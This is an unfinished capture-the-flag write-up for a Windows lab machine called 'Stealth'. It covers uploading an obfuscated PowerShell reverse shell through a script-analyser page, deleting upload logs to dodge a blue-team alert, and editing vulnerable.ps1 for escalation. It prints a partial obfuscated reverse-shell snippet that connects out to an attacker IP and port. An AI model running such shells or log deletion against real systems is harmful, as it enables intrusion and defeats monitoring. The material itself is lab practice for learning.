Stealth
โโ Challenge: Stealth
We start with an AutoRecon against our target IP.
On the website of the PowerShell script analyser we can upload a file. We use [the following tool to create an obfuscated reverse shell](GitHub - gh0x0st/Get-ReverseShell: A solution to create obfuscated reverse shells for PowerShell.](https://github.com/gh0x0st/Get-ReverseShell) and we have access to the machine!
listening on [any] 4444 ...
10.10.79.11: inverse host lookup failed: Unknown host
connect to [10.11.146.206] from (UNKNOWN) [10.10.79.11] 49992
ls
Directory: C:\Users\evader\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/29/2023 3:11 PM Task
And we get an encoded flag
-----BEGIN CERTIFICATE-----
WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDov
LzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5w
aHA=
-----END CERTIFICATE-----
We decode from base64 and we find
So we surf to this particular address. Here we are met by the following:
Hey, seems like you have uploaded invalid file. Blue team has been alerted.
Hint: Maybe removing the logs files for file uploads can help?
We now browse around this machine again and look for the log file. We find and delete it here:
After this we have our user flag. Now we need to gain root. We find the following file:
PS C:\xampp\htdocs\Uploads> dir
Directory: C:\xampp\htdocs\Uploads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/1/2023 5:10 PM 132 hello.ps1
-a---- 8/17/2023 4:58 AM 0 index.php
-a---- 11/8/2025 10:56 PM 2728 obfuscated.ps1
-a---- 11/8/2025 11:02 PM 12 qc
-a---- 9/4/2023 3:18 PM 771 vulnerable.ps1
We can use and edit vulnerable.ps1 to gain a root shell it seems. Let's try to edit the file and launch it.
Set-Alias -Name nothingHere -Value iex
$BT = New-Object "S`y`stem.Net.Sockets.T`CPCl`ient"('10.10.146.206',3333);
$replace = $BT.GetStream();
[byte[]]$B = 0..(32768*2-1)|%{0};
Edit the file to have you own IP and port, then reupload it to the Windows server.
UNFINISHED